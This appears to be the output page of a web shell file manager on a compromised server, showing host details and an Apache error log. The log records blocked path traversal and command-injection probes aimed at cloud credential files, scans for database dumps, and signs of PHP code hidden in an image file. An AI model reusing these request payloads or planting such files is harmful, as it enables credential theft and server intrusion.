⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.81
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
local
/
apache
/
domlogs
/
View File Name :
cms.dev-unit.com.error.log
[Wed Jun 04 23:28:53.470799 2025] [authz_core:error] [pid 7206:tid 140249992779520] [client 139.59.143.102:51138] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Jun 04 23:28:53.877959 2025] [:error] [pid 7240:tid 140250111796992] [client 139.59.143.102:51220] File does not exist: /home/id/cms.dev-unit.com/info.php [Wed Jun 04 23:28:55.103856 2025] [authz_core:error] [pid 7240:tid 140250001172224] [client 139.59.136.184:60382] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Jun 04 23:28:55.673968 2025] [:error] [pid 7239:tid 140249892067072] [client 139.59.136.184:60476] File does not exist: /home/id/cms.dev-unit.com/info.php [Fri Jun 06 03:35:00.206105 2025] [:error] [pid 21091:tid 139942827083520] [client 5.62.57.46:1223] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 03:35:02.885269 2025] [:error] [pid 21093:tid 139942860654336] [client 5.62.57.46:1358] File does not exist: /home/id/cms.dev-unit.com/test.php [Fri Jun 06 03:35:14.261880 2025] [:error] [pid 11111:tid 139942885832448] [client 5.62.57.46:1334] File does not exist: /home/id/cms.dev-unit.com/index.php [Fri Jun 06 08:46:44.862270 2025] [:error] [pid 28114:tid 139905246152448] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/login_up.php [Fri Jun 06 08:46:46.155869 2025] [:error] [pid 28114:tid 139905078298368] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/pms"] [unique_id "aEKAxulGAz3AdDlN_29zPAAAAJc"] [Fri Jun 06 08:46:53.524511 2025] [:error] [pid 28114:tid 139905086691072] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aEKAzelGAz3AdDlN_29zQgAAAJY"] [Fri Jun 06 08:46:56.495034 2025] [:error] [pid 28114:tid 139905195796224] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php"] [unique_id "aEKA0OlGAz3AdDlN_29zRQAAAIk"] [Fri Jun 06 08:46:58.670042 2025] [:error] [pid 28114:tid 139905153832704] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php"] [unique_id "aEKA0ulGAz3AdDlN_29zRwAAAI4"] [Fri Jun 06 08:47:01.611118 2025] [:error] [pid 28114:tid 139905128654592] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/ajax_dashboard.php"] [unique_id "aEKA1elGAz3AdDlN_29zSQAAAJE"] [Fri Jun 06 08:47:03.063570 2025] [:error] [pid 28114:tid 139905095083776] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/remote/fgt_lang"] [unique_id "aEKA1-lGAz3AdDlN_29zSgAAAJU"] [Fri Jun 06 08:47:08.464383 2025] [:error] [pid 28114:tid 139905137047296] [client 107.150.0.115:58838] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/index.php/core/preview"] [unique_id "aEKA3OlGAz3AdDlN_29zTgAAAJA"] [Fri Jun 06 08:47:57.684499 2025] [:error] [pid 28114:tid 139905162225408] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 08:47:58.907253 2025] [:error] [pid 28114:tid 139905271330560] [client 107.150.0.115:58838] File does not exist: /home/id/cms.dev-unit.com/info.php [Fri Jun 06 09:58:38.744863 2025] [:error] [pid 28204:tid 139905179010816] [client 213.232.87.230:44245] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aEKRnuwVtsTIuRogMJaFUAAAAMs"] [Fri Jun 06 09:58:38.906139 2025] [:error] [pid 28114:tid 139905153832704] [client 213.232.87.230:3199] File does not exist: /home/id/cms.dev-unit.com/wp-config.php [Fri Jun 06 09:58:38.973876 2025] [:error] [pid 28204:tid 139905195796224] [client 213.232.87.230:54525] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 09:58:38.996114 2025] [:error] [pid 28113:tid 139905220974336] [client 213.232.87.230:46125] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aEKRnusVXzdnbs2OP1eStwAAAEY"] [Fri Jun 06 09:58:39.073548 2025] [:error] [pid 28112:tid 139905103476480] [client 213.232.87.230:31393] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "aEKRnwkSknyQfMO4nOyhDAAAABQ"] [Fri Jun 06 09:58:39.129057 2025] [:error] [pid 28114:tid 139905220974336] [client 213.232.87.230:56021] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aEKRn-lGAz3AdDlN_2933wAAAIY"] [Fri Jun 06 09:58:39.151775 2025] [:error] [pid 28204:tid 139905246152448] [client 213.232.87.230:19813] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database_backup.sql"] [unique_id "aEKRn-wVtsTIuRogMJaFWAAAAMM"] [Fri Jun 06 09:58:39.861783 2025] [:error] [pid 28113:tid 139905204188928] [client 213.232.87.230:25409] File does not exist: /home/id/cms.dev-unit.com/config.php [Fri Jun 06 09:58:39.868856 2025] [:error] [pid 28204:tid 139905162225408] [client 213.232.87.230:19023] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aEKRn-wVtsTIuRogMJaFWwAAAM0"] [Fri Jun 06 09:58:39.871234 2025] [:error] [pid 28114:tid 139905128654592] [client 213.232.87.230:48589] [client 213.232.87.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aEKRn-lGAz3AdDlN_2934QAAAJE"] [Fri Jun 06 09:58:39.873837 2025] [authz_host:error] [pid 28204:tid 139905128654592] [client 213.232.87.230:30545] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Fri Jun 06 09:58:39.873850 2025] [authz_core:error] [pid 28204:tid 139905128654592] [client 213.232.87.230:30545] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Fri Jun 06 13:29:32.111667 2025] [:error] [pid 28113:tid 139905195796224] [client 185.177.72.104:62340] File does not exist: /home/id/cms.dev-unit.com/phpinfo.php [Fri Jun 06 13:29:32.124157 2025] [:error] [pid 28113:tid 139905220974336] [client 185.177.72.104:62340] File does not exist: /home/id/cms.dev-unit.com/info.php [Sat Jun 07 16:10:01.741295 2025] [autoindex:error] [pid 29528:tid 140460420998912] [client 197.58.199.72:58083] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 07 16:10:32.173327 2025] [autoindex:error] [pid 15719:tid 140460547733248] [client 197.58.199.72:58100] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jun 07 16:16:48.449528 2025] [access_compat:error] [pid 15718:tid 140460379035392] [client 197.58.199.72:58123] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/installable/core/admin [Sat Jun 07 16:20:22.912446 2025] [access_compat:error] [pid 15720:tid 140460328679168] [client 197.58.199.72:58143] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/installable/core/admin [Sat Jun 07 16:22:35.972044 2025] [access_compat:error] [pid 15719:tid 140460437784320] [client 197.58.199.72:58152] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/admin [Sat Jun 07 16:45:19.342182 2025] [access_compat:error] [pid 15806:tid 140460437784320] [client 197.58.199.72:58259] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/admin [Tue Jun 10 05:22:14.609434 2025] [autoindex:error] [pid 15289:tid 140121730922240] [client 197.58.226.17:49782] AH01276: Cannot serve directory /home/id/cms.dev-unit.com/installer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jul 15 02:01:57.453570 2025] [core:error] [pid 17099:tid 140038650115840] [client 54.212.177.106:54946] Script timed out before returning headers: index.php [Thu Jul 31 14:57:28.015476 2025] [:error] [pid 5230:tid 140191247279872] [client 198.144.182.13:41846] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Aug 03 00:54:05.192017 2025] [authz_core:error] [pid 29714:tid 140178358925056] [client 134.122.28.88:58440] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Mon Aug 11 21:41:58.841927 2025] [:error] [pid 1279:tid 1312] [client 198.144.182.13:38140] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Aug 12 07:14:49.485511 2025] [:error] [pid 28779:tid 28792] [client 198.144.182.13:49786] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Wed Aug 13 12:21:08.146520 2025] [:error] [pid 12142:tid 12154] [client 198.144.182.13:40564] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Aug 30 17:33:46.277953 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] Could not write to logfile: [Sat Aug 30 17:33:46.277995 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] Printing message to stderr: [Sat Aug 30 17:33:46.278071 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] [Sat Aug 30 17:33:46 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 17:33:46.278075 2025] [:error] [pid 985:tid 1076] [client 44.248.235.203:37858] [Sat Aug 30 19:17:48.840925 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] Could not write to logfile: [Sat Aug 30 19:17:48.840970 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] Printing message to stderr: [Sat Aug 30 19:17:48.841047 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] [Sat Aug 30 19:17:48 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 19:17:48.841052 2025] [:error] [pid 985:tid 1074] [client 44.243.194.231:47980] [Sat Aug 30 19:17:49.778152 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] Could not write to logfile:, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778198 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] Printing message to stderr:, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778274 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] [Sat Aug 30 19:17:49 2025] [info] Executing "/home/id/cms.dev-unit.com/index.php" as UID 1004, GID 1004, referer: https://cms.dev-unit.com/ [Sat Aug 30 19:17:49.778279 2025] [:error] [pid 984:tid 1043] [client 44.243.194.231:47984] , referer: https://cms.dev-unit.com/ [Tue Sep 09 20:43:09.023884 2025] [:error] [pid 4731:tid 4778] [client 4.217.236.50:4497] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Sep 16 02:38:59.151480 2025] [core:error] [pid 14350:tid 14364] [client 45.148.10.248:35178] Script timed out before returning headers: index.php [Tue Sep 16 02:38:59.170417 2025] [core:error] [pid 18995:tid 19069] [client 45.148.10.248:40868] Script timed out before returning headers: index.php [Sat Sep 20 10:51:08.852018 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 10:51:08.852213 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 10:51:08.852337 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 10:51:08.852432 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 10:51:08.852446 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] Stack trace:, referer: https://www.google.com [Sat Sep 20 10:51:08.852493 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] #0 /home/id/cms.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 10:51:08.852503 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] #1 {main}, referer: https://www.google.com [Sat Sep 20 10:51:08.852554 2025] [:error] [pid 1398:tid 1411] [client 207.154.240.68:56532] thrown in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Sat Sep 20 16:49:36.233246 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: Undefined variable $tmp in /home/id/cms.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 16:49:36.233437 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: include(/home/id/cms.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 16:49:36.233562 2025] [:error] [pid 13751:tid 13798] [client 207.154.240.68:46636] PHP Warning: include(): Failed opening '/home/id/cms.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 16:49:36.233653 2025] [:error] [pid 13751:tid 13798] [client 